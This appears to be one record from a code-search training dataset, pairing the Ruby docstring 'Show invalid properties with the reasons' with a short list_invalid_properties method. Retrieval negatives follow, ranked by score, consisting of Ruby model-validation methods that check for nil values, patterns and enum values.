query
stringlengths 7
9.55k
| document
stringlengths 10
363k
| metadata
dict | negatives
listlengths 0
101
| negative_scores
listlengths 0
101
| document_score
stringlengths 3
10
| document_rank
stringclasses 102
values |
|---|---|---|---|---|---|---|
Show invalid properties with the reasons. Usually used together with valid?
|
def list_invalid_properties
invalid_properties = Array.new
invalid_properties
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def list_invalid_properties\n invalid_properties = super\n if @class_id.nil?\n invalid_properties.push('invalid value for \"class_id\", class_id cannot be nil.')\n end\n\n if @object_type.nil?\n invalid_properties.push('invalid value for \"object_type\", object_type cannot be nil.')\n end\n\n invalid_properties\n end",
"def list_invalid_properties\n invalid_properties = super\n if @class_id.nil?\n invalid_properties.push('invalid value for \"class_id\", class_id cannot be nil.')\n end\n\n if @object_type.nil?\n invalid_properties.push('invalid value for \"object_type\", object_type cannot be nil.')\n end\n\n invalid_properties\n end",
"def list_invalid_properties\n invalid_properties = super\n if @class_id.nil?\n invalid_properties.push('invalid value for \"class_id\", class_id cannot be nil.')\n end\n\n if @object_type.nil?\n invalid_properties.push('invalid value for \"object_type\", object_type cannot be nil.')\n end\n\n invalid_properties\n end",
"def list_invalid_properties\n invalid_properties = super\n if @class_id.nil?\n invalid_properties.push('invalid value for \"class_id\", class_id cannot be nil.')\n end\n\n if @object_type.nil?\n invalid_properties.push('invalid value for \"object_type\", object_type cannot be nil.')\n end\n\n invalid_properties\n end",
"def list_invalid_properties\n invalid_properties = super\n invalid_properties\n end",
"def list_invalid_properties\n invalid_properties = super\n invalid_properties\n end",
"def list_invalid_properties\n invalid_properties = super\n invalid_properties\n end",
"def list_invalid_properties\n invalid_properties = super\n invalid_properties\n end",
"def list_invalid_properties\n invalid_properties = super\n invalid_properties\n end",
"def list_invalid_properties\n invalid_properties = super\n invalid_properties\n end",
"def list_invalid_properties\n invalid_properties = super\n invalid_properties\n end",
"def list_invalid_properties\n invalid_properties = super\n invalid_properties\n end",
"def list_invalid_properties\n invalid_properties = super\n if @class_id.nil?\n invalid_properties.push('invalid value for \"class_id\", class_id cannot be nil.')\n end\n\n if @object_type.nil?\n invalid_properties.push('invalid value for \"object_type\", object_type cannot be nil.')\n end\n\n pattern = Regexp.new(/^$|^[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}$/)\n if !@uuid.nil? && @uuid !~ pattern\n invalid_properties.push(\"invalid value for \\\"uuid\\\", must conform to the pattern #{pattern}.\")\n end\n\n pattern = Regexp.new(/^$|^[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}$/)\n if !@vdisk_id.nil? && @vdisk_id !~ pattern\n invalid_properties.push(\"invalid value for \\\"vdisk_id\\\", must conform to the pattern #{pattern}.\")\n end\n\n invalid_properties\n end",
"def list_invalid_properties\n invalid_properties = super\n if @style.nil?\n invalid_properties.push('invalid value for \"style\", style cannot be nil.')\n end\n\n invalid_properties\n end",
"def list_invalid_properties\n invalid_properties = super\n if @class_id.nil?\n invalid_properties.push('invalid value for \"class_id\", class_id cannot be nil.')\n end\n\n if @object_type.nil?\n invalid_properties.push('invalid value for \"object_type\", object_type cannot be nil.')\n end\n\n if !@name.nil? && @name.to_s.length > 31\n invalid_properties.push('invalid value for \"name\", the character length must be smaller than or equal to 31.')\n end\n\n pattern = Regexp.new(/^[a-zA-Z0-9\\-\\._:]+$/)\n if !@name.nil? && @name !~ pattern\n invalid_properties.push(\"invalid value for \\\"name\\\", must conform to the pattern #{pattern}.\")\n end\n\n pattern = Regexp.new(/^$|((^20|5[0-9a-fA-F]{1}):([0-9a-fA-F]{2}:){6}([0-9a-fA-F]{2}))/)\n if !@static_wwpn_address.nil? && @static_wwpn_address !~ pattern\n invalid_properties.push(\"invalid value for \\\"static_wwpn_address\\\", must conform to the pattern #{pattern}.\")\n end\n\n pattern = Regexp.new(/^$|((^20|5[0-9a-fA-F]{1}):([0-9a-fA-F]{2}:){6}([0-9a-fA-F]{2}))/)\n if !@wwpn.nil? && @wwpn !~ pattern\n invalid_properties.push(\"invalid value for \\\"wwpn\\\", must conform to the pattern #{pattern}.\")\n end\n\n invalid_properties\n end",
"def list_invalid_properties\n invalid_properties = super\n if @is_object_icon.nil?\n invalid_properties.push('invalid value for \"is_object_icon\", is_object_icon cannot be nil.')\n end\n\n invalid_properties\n end",
"def list_invalid_properties\n invalid_properties = Array.new\n if @input_currency.nil?\n invalid_properties.push('invalid value for \"input_currency\", input_currency cannot be nil.')\n end\n\n if @sender.nil?\n invalid_properties.push('invalid value for \"sender\", sender cannot be nil.')\n end\n\n if @recipients.nil?\n invalid_properties.push('invalid value for \"recipients\", recipients cannot be nil.')\n end\n\n invalid_properties\n end",
"def list_invalid_properties\n invalid_properties = super\n if @index.nil?\n invalid_properties.push('invalid value for \"index\", index cannot be nil.')\n end\n\n if @orientation.nil?\n invalid_properties.push('invalid value for \"orientation\", orientation cannot be nil.')\n end\n\n if @size.nil?\n invalid_properties.push('invalid value for \"size\", size cannot be nil.')\n end\n\n if @type.nil?\n invalid_properties.push('invalid value for \"type\", type cannot be nil.')\n end\n\n invalid_properties\n end",
"def list_invalid_properties\n invalid_properties = super\n if @direction.nil?\n invalid_properties.push('invalid value for \"direction\", direction cannot be nil.')\n end\n\n if @shape.nil?\n invalid_properties.push('invalid value for \"shape\", shape cannot be nil.')\n end\n\n if @linear_angle.nil?\n invalid_properties.push('invalid value for \"linear_angle\", linear_angle cannot be nil.')\n end\n\n if @is_scaled.nil?\n invalid_properties.push('invalid value for \"is_scaled\", is_scaled cannot be nil.')\n end\n\n if @tile_flip.nil?\n invalid_properties.push('invalid value for \"tile_flip\", tile_flip cannot be nil.')\n end\n\n invalid_properties\n end",
"def list_invalid_properties\n invalid_properties = Array.new\n if @format.nil?\n invalid_properties.push('invalid value for \"format\", format cannot be nil.')\n end\n\n invalid_properties\n end"
] |
[
"0.76497203",
"0.76497203",
"0.76497203",
"0.76497203",
"0.7637422",
"0.7637422",
"0.7637422",
"0.7637422",
"0.7637422",
"0.7637422",
"0.7637422",
"0.7637422",
"0.7356452",
"0.7334807",
"0.72685325",
"0.7238964",
"0.7231359",
"0.72258264",
"0.7208294",
"0.71760833"
] |
0.7170241
|
93
|
Check to see if the all the properties in the model are valid
|
def valid?
true
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def validate_properties\n true\n end",
"def validate_properties\n true\n end",
"def validate\n super\n\n check_optional_property :collection, String\n check_optional_property :create, String\n check_optional_property :delete, String\n check_optional_property :flush, String\n check_optional_property :prefetch, String\n check_optional_property :request_to_query, String\n check_optional_property :resource_to_request_patch, String\n check_optional_property :return_if_object, String\n check_optional_property :self_link, String\n end",
"def valid_attributes?\n true\n end",
"def valid_attributes?\n attribute_errors.empty?\n end",
"def valid?\n return false if @property_code.nil?\n return false if @property_name.nil?\n return false if @location.nil?\n return false if @total_price.nil?\n return false if @min_daily_rate.nil?\n return true\n end",
"def validate_presence_of(klazz, properties)\r\n instance = klazz.new \r\n instance.should_not be_valid\r\n \r\n properties.each do |property| \r\n instance.errors.should be_invalid(property)\r\n err_properties = instance.errors[property]\r\n if err_properties.is_a? Array\r\n err_properties.include?(ActiveRecord::Errors.default_error_messages[:blank]).should be_true\r\n else\r\n err_properties.should == ActiveRecord::Errors.default_error_messages[:blank] \r\n end\r\n end \r\n end",
"def validate_attributes!(attributes)\n invalid_properties = attributes.keys.map(&:to_s) - self.attributes.keys\n raise UndefinedPropertyError, \"Undefined properties: #{invalid_properties.join(',')}\" if invalid_properties.size > 0\n end",
"def model_valid?\n true\n end",
"def model_valid?\n true\n end",
"def valid?\n self.errors = []\n self.content_type.fields.each do |field|\n if field.required\n if self.dynamic_getter(field.name).blank?\n self.errors << field.name\n end\n end\n end\n self.errors.blank?\n end",
"def valid?\n validate\n @model.errors.on(:preferences).blank?\n end",
"def validate_properties\n if @properties.keys.count > 0\n if @properties.key?(:label)\n unless @properties[:label] =~ /^[a-zA-Z][\\w|\\s]*$/\n raise 'property label validation error'\n end\n end\n\n if @properties.key?(:default_aggregate)\n unless @properties[:default_aggregate] =~ /^max$|^min$|^avg$|^count$/i\n raise 'property default_aggregate validation error'\n end\n end\n end\n end",
"def validate_properties\n @properties.each do |property, values|\n valid_values = validate_values(property, values)\n\n if valid_values.is_a?(Array) && valid_values == [] || valid_values.nil?\n @properties.delete(property)\n else\n @properties[property] = valid_values\n end\n end\n end",
"def validate\n valid?\n end",
"def validate_attributes!(attributes)\n return attributes if attributes.blank?\n invalid_properties = attributes.keys.map(&:to_s) - self.attributes.keys\n invalid_properties.reject! { |name| self.respond_to?(\"#{name}=\") }\n fail UndefinedPropertyError, \"Undefined properties: #{invalid_properties.join(',')}\" if !invalid_properties.empty?\n end",
"def is_valid; end",
"def valid?\n # TODO validate nested objects\n output = super\n errors.empty? && output\n end",
"def property_checks\n errors.add(:base, \"You can't have a Thing without properties\") if property_keys.empty?\n\n self.property_keys.each do |key|\n errors.add(:properties, \"'#{key}' is an invalid property for this List\") unless available_property_keys.include?(key)\n end\n end",
"def valid_for_attributes( model, attributes )\n unless model.valid?\n errors = model.errors\n our_errors = Array.new\n errors.each { |attr,error|\n if attributes.include? attr\n our_errors << [attr,error]\n end\n }\n errors.clear\n our_errors.each { |attr,error| errors.add(attr,error) }\n return false unless errors.empty?\n end\n return true\n end",
"def valid?\n type_validator = EnumAttributeValidator.new('String', [\"person\", \"business\"])\n return false unless type_validator.valid?(@type)\n return false if @country.nil?\n return false if @street.nil?\n return false if @postal_code.nil?\n return false if @city.nil?\n return false if @email.nil?\n return false if @ip.nil?\n identification_type_validator = EnumAttributeValidator.new('String', [\"DL\", \"PP\", \"ID\", \"OT\"])\n return false unless identification_type_validator.valid?(@identification_type)\n legal_entity_type_validator = EnumAttributeValidator.new('String', [\"sole_proprietorship\", \"partnership\", \"privately_owned_company\", \"publicly_owned_company\", \"government_owned_entity\", \"trust\", \"ngo\", \"club_and_society\", \"go\", \"other\", \"financial_institution\", \"mto\"])\n return false unless legal_entity_type_validator.valid?(@legal_entity_type)\n nature_of_business_validator = EnumAttributeValidator.new('String', [\"personal\", \"agriculture_and_hunting\", \"forestry\", \"fishing\", \"agricultural_by_products\", \"coal_mining\", \"oil_mining\", \"iron_ore_mining\", \"other_metal_and_diamond_mining\", \"other_mineral_mining\", \"manufacturing_of_food_drink_tobacco\", \"manufacturing_of_textiles_leather_fur_furniture\", \"manufacture_of_wooden_products_furniture\", \"manufacture_of_paper_pulp_allied_products\", \"manufacture_of_chemicals_medical_petroleum_rubber_plastic_products\", \"manufacture_of_pottery_china_glass_stone\", \"manufacture_of_iron_steel_non_ferrous_metals_basic_industries\", \"manufacture_of_metal_products_electrical_and_scientific_engineering\", \"manufacture_of_jewelry_musical_instruments_toys\", \"electricity_gas_and_water\", \"construction\", \"wholesale_trade\", \"retail_trade\", \"catering_incl_hotels\", \"transport_storage\", \"communications\", \"finance_and_holding_companies\", \"insurance\", \"business_services\", \"real_estate_development_investment\", \"central_state_governments\", \"community_services_defence_police_prisons_etc\", \"social_services_education_health_care\", \"personal_services_leisure_services\", \"personal_services_domestic_laundry_repairs\", \"personal_services_embassies_international_organisations\"])\n return false unless nature_of_business_validator.valid?(@nature_of_business)\n return false if @documents.nil?\n gender_validator = EnumAttributeValidator.new('String', [\"M\", \"F\", \"O\"])\n return false unless gender_validator.valid?(@gender)\n true\n end",
"def valid?\n return false if !super\n return false if @index.nil?\n return false if @orientation.nil?\n orientation_validator = EnumAttributeValidator.new('String', ['Horizontal', 'Vertical'])\n return false unless orientation_validator.valid?(@orientation)\n return false if @size.nil?\n size_validator = EnumAttributeValidator.new('String', ['Full', 'Half', 'Quarter'])\n return false unless size_validator.valid?(@size)\n return false if @type.nil?\n type_validator = EnumAttributeValidator.new('String', ['Title', 'Body', 'CenteredTitle', 'Subtitle', 'DateAndTime', 'SlideNumber', 'Footer', 'Header', 'Object', 'Chart', 'Table', 'ClipArt', 'Diagram', 'Media', 'SlideImage', 'Picture'])\n return false unless type_validator.valid?(@type)\n true\n end",
"def validate\n validate_string_attributes\n @relations.map(&:validate)\n end",
"def is_valid?\n end",
"def run_validations\n true\n end",
"def validate\n validate_params\n validate_colour\n validate_coordinates\n validate_dimension\n end",
"def checkAttributeRequirements\n if @valid_attributes.empty?\n @error_text = \"No valid attributes found\"\n return false\n elsif (@mandatory_attributes_from_db & @valid_attributes) != @mandatory_attributes_from_db\n missing_attr = @mandatory_attributes_from_db - (@mandatory_attributes_from_db & @valid_attributes)\n\n x_attr_txt = \"\"\n missing_attr.each {|x_attr| x_attr_txt += x_attr[:name] + \", \"}\n @error_text = \"Mandatory attributes #{x_attr_txt[0..-3]} is/are missing\"\n return false\n end\n\n return true\n end",
"def validations\n {}\n end",
"def validatable?\n true\n end",
"def validate\n validate_params\n validate_coordinates\n validate_colour\n validate_dimension\n end",
"def validate_required\n [\n :project_name,\n :status,\n :requester_id,\n :subject_expert_id,\n :sponsor_id,\n :vision,\n :goal,\n :description,\n :scope,\n :advice_required,\n :program_id,\n :train_id,\n :funding_method,\n :cost_center,\n :funding_status,\n :budget_allocated,\n :priority,\n :start_date,\n :end_date,\n :risk_rating,\n :risks,\n :projected_revenue,\n ].each do |field|\n if self.attributes[field.to_s].nil? || self.attributes[field.to_s].blank?\n # intentionally vague!\n add_validation 'All fields are required to perform further validations'\n return false\n end\n end\n true\n end",
"def validate\n validate_root\n validate_associated\n valid?\n end",
"def validate\n true\n end",
"def valid?\n return false if @id.nil?\n return false if @created.nil?\n return false if @modified.nil?\n return false if @company_name.nil?\n return false if @company_name.to_s.length < 1\n return false if @domain_name.nil?\n return false if @state.nil?\n state_validator = EnumAttributeValidator.new('String', [\"active\", \"deactivated\"])\n return false unless state_validator.valid?(@state)\n return false if @billing_email.nil?\n return false if @application_count.nil?\n return false if @user_count.nil?\n return false if @campaigns_active_count.nil?\n return false if @campaigns_inactive_count.nil?\n true\n end",
"def valid?\n _errors_before = self.errors.dup\n _s = super\n validate_attributes\n _errors_before.each { |e| append_error(_errors_before,e) }\n self.errors.empty?\n end",
"def valid?\n true\n end",
"def validate!\n expected_props, required_props = @properties.keys, @required\n\n unless is_a?(Dialect) || is_a?(Template)\n expected_props = expected_props + INHERITED_PROPERTIES.keys\n end\n\n # It has only expected properties (exclude metadata)\n keys = self.keys - [:\"@context\"]\n keys = keys.reject {|k| k.to_s.include?(':')} unless is_a?(Dialect)\n raise \"#{type} has unexpected keys: #{keys - expected_props}\" unless keys.all? {|k| expected_props.include?(k)}\n\n # It has required properties\n raise \"#{type} missing required keys: #{required_props & keys}\" unless (required_props & keys) == required_props\n\n # Every property is valid\n keys.each do |key|\n value = self[key]\n is_valid = case key\n when :columns\n column_names = value.map(&:name)\n value.is_a?(Array) &&\n value.all? {|v| v.is_a?(Column) && v.validate!} &&\n begin\n # The name properties of the column descriptions must be unique within a given table description.\n column_names = value.map(&:name)\n raise \"Columns must have unique names\" if column_names.uniq != column_names\n true\n end\n when :commentPrefix then value.is_a?(String) && value.length == 1\n when :datatype then value.is_a?(String) && DATATYPES.keys.map(&:to_s).include?(value)\n when :default then value.is_a?(String)\n when :delimiter then value.is_a?(String) && value.length == 1\n when :dialect then value.is_a?(Dialect) && value.validate!\n when :doubleQuote then %w(true false 1 0).include?(value.to_s.downcase)\n when :encoding then Encoding.find(value)\n when :foreignKeys\n # An array of foreign key definitions that define how the values from specified columns within this table link to rows within this table or other tables. A foreign key definition is a JSON object with the properties:\n value.is_a?(Array) && value.all? do |fk|\n raise \"Foreign key must be an object\" unless fk.is_a?(Hash)\n columns, reference = fk['columns'], fk['reference']\n raise \"Foreign key missing columns and reference\" unless columns && reference\n raise \"Foreign key has extra entries\" unless fk.keys.length == 2\n raise \"Foreign key must reference columns\" unless Array(columns).all? {|k| self.columns.any? {|c| c.name == k}}\n raise \"Foreign key reference must be an Object\" unless reference.is_a?(Hash)\n\n if reference.has_key?('resource')\n raise \"Foreign key having a resource reference, must not have a schema\" if reference.has_key?('schema')\n # FIXME resource is a URL of a specific resource (table) which must exist\n elsif reference.has_key?('schema')\n # FIXME schema is a URL of a specific schema which must exist\n end\n # FIXME: columns\n true\n end\n when :format then value.is_a?(String)\n when :header then %w(true false 1 0).include?(value.to_s.downcase)\n when :headerColumnCount, :headerRowCount\n value.is_a?(Numeric) && value.integer? && value > 0\n when :length\n # Applications must raise an error if length, maxLength or minLength are specified and the cell value is not a list (ie separator is not specified), a string or one of its subtypes, or a binary value.\n raise \"Use if minLength or maxLength with length requires separator\" if self[:minLength] || self[:maxLength] && !self[:separator]\n raise \"Use of both length and minLength requires they be equal\" unless self.fetch(:minLength, value) == value\n raise \"Use of both length and maxLength requires they be equal\" unless self.fetch(:maxLength, value) == value\n value.is_a?(Numeric) && value.integer? && value > 0\n when :language then BCP47::Language.identify(value)\n when :lineTerminator then value.is_a?(String)\n when :minimum, :maximum, :minInclusive, :maxInclusive, :minExclusive, :maxExclusive\n value.is_a?(Numeric) ||\n RDF::Literal::Date.new(value).valid? ||\n RDF::Literal::Time.new(value).valid? ||\n RDF::Literal::DateTime.new(value).valid?\n when :minLength, :maxLength\n value.is_a?(Numeric) && value.integer? && value > 0\n when :name then value.is_a?(String) && !name.start_with?(\"_\")\n when :notes then value.is_a?(Array) && value.all? {|v| v.is_a?(Hash)}\n when :null then value.is_a?(String)\n when :predicateUrl then Array(value).all? {|v| RDF::URI(v).valid?}\n when :primaryKey\n # A column reference property that holds either a single reference to a column description object or an array of references.\n Array(value).all? do |k|\n self.columns.any? {|c| c.name == k}\n end\n when :quoteChar then value.is_a?(String) && value.length == 1\n when :required then %w(true false 1 0).include?(value.to_s.downcase)\n when :resources then value.is_a?(Array) && value.all? {|v| v.is_a?(Table) && v.validate!}\n when :schema then value.is_a?(Schema) && value.validate!\n when :separator then value.nil? || value.is_a?(String) && value.length == 1\n when :skipInitialSpace then %w(true false 1 0).include?(value.to_s.downcase)\n when :skipBlankRows then %w(true false 1 0).include?(value.to_s.downcase)\n when :skipColumns then value.is_a?(Numeric) && value.integer? && value >= 0\n when :skipRows then value.is_a?(Numeric) && value.integer? && value >= 0\n when :source then %w(json rdf).include?(value)\n when :\"table-direction\" then %w(rtl ltr default).include?(value)\n when :targetFormat, :templateFormat then RDF::URI(value).valid?\n when :templates then value.is_a?(Array) && value.all? {|v| v.is_a?(Template) && v.validate!}\n when :\"text-direction\" then %w(rtl ltr).include?(value)\n when :title then valid_natural_language_property?(value)\n when :trim then %w(true false 1 0 start end).include?(value.to_s.downcase)\n when :urlTemplate then value.is_a?(String)\n when :@id then @id.valid?\n when :@type then value.to_sym == type\n else\n raise \"?!?! shouldn't get here for key #{key}\"\n end\n raise \"#{type} has invalid #{key}: #{value.inspect}\" unless is_valid\n end\n\n self\n end",
"def valid?\n return false if @subject_property.nil?\n return false if @proprietorship.nil?\n proprietorship_validator = EnumAttributeValidator.new('String', [\"Unknown\", \"Sole\", \"Joint\"])\n return false unless proprietorship_validator.valid?(@proprietorship)\n return false if @surname.nil?\n return false if @forename.nil?\n return false if @middle_name.nil?\n return true\n end",
"def valid?\n return false if @class_id.nil?\n class_id_validator = EnumAttributeValidator.new('String', [\"cond.HclStatusDetail\"])\n return false unless class_id_validator.valid?(@class_id)\n return false if @object_type.nil?\n object_type_validator = EnumAttributeValidator.new('String', [\"cond.HclStatusDetail\"])\n return false unless object_type_validator.valid?(@object_type)\n hardware_status_validator = EnumAttributeValidator.new('String', [\"Missing-Os-Driver-Info\", \"Incompatible-Server-With-Component\", \"Incompatible-Processor\", \"Incompatible-Os-Info\", \"Incompatible-Component-Model\", \"Incompatible-Firmware\", \"Incompatible-Driver\", \"Incompatible-Firmware-Driver\", \"Service-Unavailable\", \"Service-Error\", \"Unrecognized-Protocol\", \"Not-Evaluated\", \"Compatible\"])\n return false unless hardware_status_validator.valid?(@hardware_status)\n reason_validator = EnumAttributeValidator.new('String', [\"Missing-Os-Driver-Info\", \"Incompatible-Server-With-Component\", \"Incompatible-Processor\", \"Incompatible-Os-Info\", \"Incompatible-Component-Model\", \"Incompatible-Firmware\", \"Incompatible-Driver\", \"Incompatible-Firmware-Driver\", \"Service-Unavailable\", \"Service-Error\", \"Unrecognized-Protocol\", \"Not-Evaluated\", \"Compatible\"])\n return false unless reason_validator.valid?(@reason)\n software_status_validator = EnumAttributeValidator.new('String', [\"Missing-Os-Driver-Info\", \"Incompatible-Server-With-Component\", \"Incompatible-Processor\", \"Incompatible-Os-Info\", \"Incompatible-Component-Model\", \"Incompatible-Firmware\", \"Incompatible-Driver\", \"Incompatible-Firmware-Driver\", \"Service-Unavailable\", \"Service-Error\", \"Unrecognized-Protocol\", \"Not-Evaluated\", \"Compatible\"])\n return false unless software_status_validator.valid?(@software_status)\n status_validator = EnumAttributeValidator.new('String', [\"Incomplete\", \"Not-Found\", \"Not-Listed\", \"Validated\", \"Not-Evaluated\"])\n return false unless status_validator.valid?(@status)\n true && super\n end",
"def core_attributes_valid\n core_attributes = [@rateable, @rater, @ratee, @rating_type]\n return if core_attributes.all? { |atr| atr.present? && atr.valid? }\n errors.add('message', 'Not all core attributes present and valid.')\n end",
"def valid?\n super\n errors.empty?\n end",
"def valid?\n \n if @account_id.nil?\n false\n elsif @campaign_id.nil?\n false\n elsif @csp_id.nil?\n false\n elsif @status.nil?\n false\n elsif @create_date.nil?\n false\n elsif @auto_renewal.nil?\n false\n elsif @brand_id.nil?\n false\n elsif @usecase.nil?\n false\n elsif @sub_usecases.nil?\n false\n elsif @description.nil?\n false\n elsif @embedded_link.nil?\n false\n elsif @embedded_phone.nil?\n false\n elsif @affiliate_marketing.nil?\n false\n elsif @number_pool.nil?\n false\n elsif @age_gated.nil?\n false\n elsif @direct_lending.nil?\n false\n elsif @subscriber_optin.nil?\n false\n elsif @subscriber_optout.nil?\n false\n elsif @subscriber_help.nil?\n false\n elsif @sample1.nil?\n false\n elsif @mock.nil?\n false\n else\n list_invalid_properties.length() == 0\n end\n end",
"def valid?(metadata)\n validate.each do |attr|\n return false if metadata[attr.to_sym].nil? || metadata[attr.to_sym].zero?\n end\n end",
"def is_valid\n return true\n end",
"def validate_attrs\n @target.present? && !@target.errors.any? && @actor.present? && @action_key.present?\n end",
"def list_invalid_properties\n invalid_properties = super\n if @class_id.nil?\n invalid_properties.push('invalid value for \"class_id\", class_id cannot be nil.')\n end\n\n if @object_type.nil?\n invalid_properties.push('invalid value for \"object_type\", object_type cannot be nil.')\n end\n\n if !@name.nil? && @name.to_s.length > 31\n invalid_properties.push('invalid value for \"name\", the character length must be smaller than or equal to 31.')\n end\n\n pattern = Regexp.new(/^[a-zA-Z0-9\\-\\._:]+$/)\n if !@name.nil? && @name !~ pattern\n invalid_properties.push(\"invalid value for \\\"name\\\", must conform to the pattern #{pattern}.\")\n end\n\n pattern = Regexp.new(/^$|((^20|5[0-9a-fA-F]{1}):([0-9a-fA-F]{2}:){6}([0-9a-fA-F]{2}))/)\n if !@static_wwpn_address.nil? && @static_wwpn_address !~ pattern\n invalid_properties.push(\"invalid value for \\\"static_wwpn_address\\\", must conform to the pattern #{pattern}.\")\n end\n\n pattern = Regexp.new(/^$|((^20|5[0-9a-fA-F]{1}):([0-9a-fA-F]{2}:){6}([0-9a-fA-F]{2}))/)\n if !@wwpn.nil? && @wwpn !~ pattern\n invalid_properties.push(\"invalid value for \\\"wwpn\\\", must conform to the pattern #{pattern}.\")\n end\n\n invalid_properties\n end",
"def valid_save?\n valid = true\n\n if self.name.nil? || self.name == \"\"\n valid = false\n end\n\n if self.general_info.nil? || self.general_info == \"\"\n valid = false\n end\n\n if self.technical_specs.nil? || self.technical_specs == \"\"\n valid = false\n end\n\n if self.where_to_buy.nil? || self.where_to_buy == \"\"\n valid = false\n end\n\n return valid\n end",
"def valid?\n schema.validate(self)\n end",
"def valid?\n reset_errors\n valid_date?\n valid_user?\n valid_activity_type?\n self.errors.empty?\n end",
"def valid?\n validate\n end",
"def product_attributes_must_not_be_empty\n\n\t\t# Instance\n\t\tproduct = Product.new\n\n\t\tassert product.invalid?\n\t\tassert product.errors[:title].any?\n\t\tassert product.errors[:description].any?\n\t\tassert product.errors[:price].any?\n\t\tassert product.errors[:image_url].any?\n\tend",
"def valid?\n return false if @id.nil?\n return false if @id !~ Regexp.new(/^psc_[a-zA-Z0-9]+$/)\n carrier_validator = EnumAttributeValidator.new('String', [\"USPS\"])\n return false unless carrier_validator.valid?(@carrier)\n return false if !@front_template_id.nil? && @front_template_id !~ Regexp.new(/^tmpl_[a-zA-Z0-9]+$/)\n return false if !@back_template_id.nil? && @back_template_id !~ Regexp.new(/^tmpl_[a-zA-Z0-9]+$/)\n return false if !@front_template_version_id.nil? && @front_template_version_id !~ Regexp.new(/^vrsn_[a-zA-Z0-9]+$/)\n return false if !@back_template_version_id.nil? && @back_template_version_id !~ Regexp.new(/^vrsn_[a-zA-Z0-9]+$/)\n object_validator = EnumAttributeValidator.new('String', [\"postcard\"])\n return false unless object_validator.valid?(@object)\n return false if @url.nil?\n return false if @url !~ Regexp.new(/^https:\\/\\/(lob-assets|lob-assets-staging)\\.com\\/(letters|postcards|bank-accounts|checks|self-mailers|cards)\\/[a-z]{3,4}_[a-z0-9]{15,16}(\\.pdf|_thumb_[a-z]+_[0-9]+\\.png)\\?(version=[a-z0-9-]*&)?expires=[0-9]{10}&signature=[a-zA-Z0-9_-]+$/)\n return false if !@description.nil? && @description.to_s.length > 255\n true\n end",
"def valid?\n return false if @class_id.nil?\n class_id_validator = EnumAttributeValidator.new('String', [\"network.ElementSummary\"])\n return false unless class_id_validator.valid?(@class_id)\n return false if @object_type.nil?\n object_type_validator = EnumAttributeValidator.new('String', [\"network.ElementSummary\"])\n return false unless object_type_validator.valid?(@object_type)\n ethernet_switching_mode_validator = EnumAttributeValidator.new('String', [\"end-host\", \"switch\"])\n return false unless ethernet_switching_mode_validator.valid?(@ethernet_switching_mode)\n fc_switching_mode_validator = EnumAttributeValidator.new('String', [\"end-host\", \"switch\"])\n return false unless fc_switching_mode_validator.valid?(@fc_switching_mode)\n management_mode_validator = EnumAttributeValidator.new('String', [\"IntersightStandalone\", \"UCSM\", \"Intersight\"])\n return false unless management_mode_validator.valid?(@management_mode)\n thermal_validator = EnumAttributeValidator.new('String', [\"unknown\", \"ok\", \"upper-non-recoverable\", \"upper-critical\", \"upper-non-critical\", \"lower-non-critical\", \"lower-critical\", \"lower-non-recoverable\"])\n return false unless thermal_validator.valid?(@thermal)\n true && super\n end",
"def valid?\n\t\t\t\ttrue\n\t\t\tend",
"def validate\r\n validate! rescue false\r\n end",
"def validate\n validate_string_attributes\n end",
"def valid?\n self.errors = Mongomatic::Errors.new\n do_callback(:before_validate)\n check_required_fields\n validate\n do_callback(:after_validate)\n self.errors.empty?\n end",
"def valid\n @valid\n end",
"def valid_objects\n all_objects.select { |o| o.valid? }\n end",
"def valid?\n return false if @summary.nil?\n return false if @summary.to_s.length > 100\n record_type_validator = EnumAttributeValidator.new('String', [\"ServiceTicket\", \"ProjectTicket\", \"ProjectIssue\"])\n return false unless record_type_validator.valid?(@record_type)\n return false if !@wbs_code.nil? && @wbs_code.to_s.length > 50\n return false if @company.nil?\n return false if !@site_name.nil? && @site_name.to_s.length > 50\n return false if !@address_line1.nil? && @address_line1.to_s.length > 50\n return false if !@address_line2.nil? && @address_line2.to_s.length > 50\n return false if !@city.nil? && @city.to_s.length > 50\n return false if !@state_identifier.nil? && @state_identifier.to_s.length > 50\n return false if !@zip.nil? && @zip.to_s.length > 12\n return false if !@contact_phone_number.nil? && @contact_phone_number.to_s.length > 20\n return false if !@contact_phone_extension.nil? && @contact_phone_extension.to_s.length > 15\n return false if !@contact_email_address.nil? && @contact_email_address.to_s.length > 250\n severity_validator = EnumAttributeValidator.new('String', [\"Low\", \"Medium\", \"High\"])\n return false unless severity_validator.valid?(@severity)\n impact_validator = EnumAttributeValidator.new('String', [\"Low\", \"Medium\", \"High\"])\n return false unless impact_validator.valid?(@impact)\n return false if !@external_x_ref.nil? && @external_x_ref.to_s.length > 100\n return false if !@po_number.nil? && @po_number.to_s.length > 50\n return false if !@automatic_email_cc.nil? && @automatic_email_cc.to_s.length > 1000\n sub_billing_method_validator = EnumAttributeValidator.new('String', [\"ActualRates\", \"FixedFee\", \"NotToExceed\", \"OverrideRate\"])\n return false unless sub_billing_method_validator.valid?(@sub_billing_method)\n knowledge_base_link_type_validator = EnumAttributeValidator.new('String', [\"ServiceTicket\", \"ProjectTicket\", \"ProjectIssue\", \"KnowledgeBaseArticle\", \"Time\", \"Activity\"])\n return false unless knowledge_base_link_type_validator.valid?(@knowledge_base_link_type)\n bill_time_validator = EnumAttributeValidator.new('String', [\"Billable\", \"DoNotBill\", \"NoCharge\", \"NoDefault\"])\n return false unless bill_time_validator.valid?(@bill_time)\n bill_expenses_validator = EnumAttributeValidator.new('String', [\"Billable\", \"DoNotBill\", \"NoCharge\", \"NoDefault\"])\n return false unless bill_expenses_validator.valid?(@bill_expenses)\n bill_products_validator = EnumAttributeValidator.new('String', [\"Billable\", \"DoNotBill\", \"NoCharge\", \"NoDefault\"])\n return false unless bill_products_validator.valid?(@bill_products)\n predecessor_type_validator = EnumAttributeValidator.new('String', [\"Ticket\", \"Phase\"])\n return false unless predecessor_type_validator.valid?(@predecessor_type)\n return true\n end",
"def validate!\n true\n end",
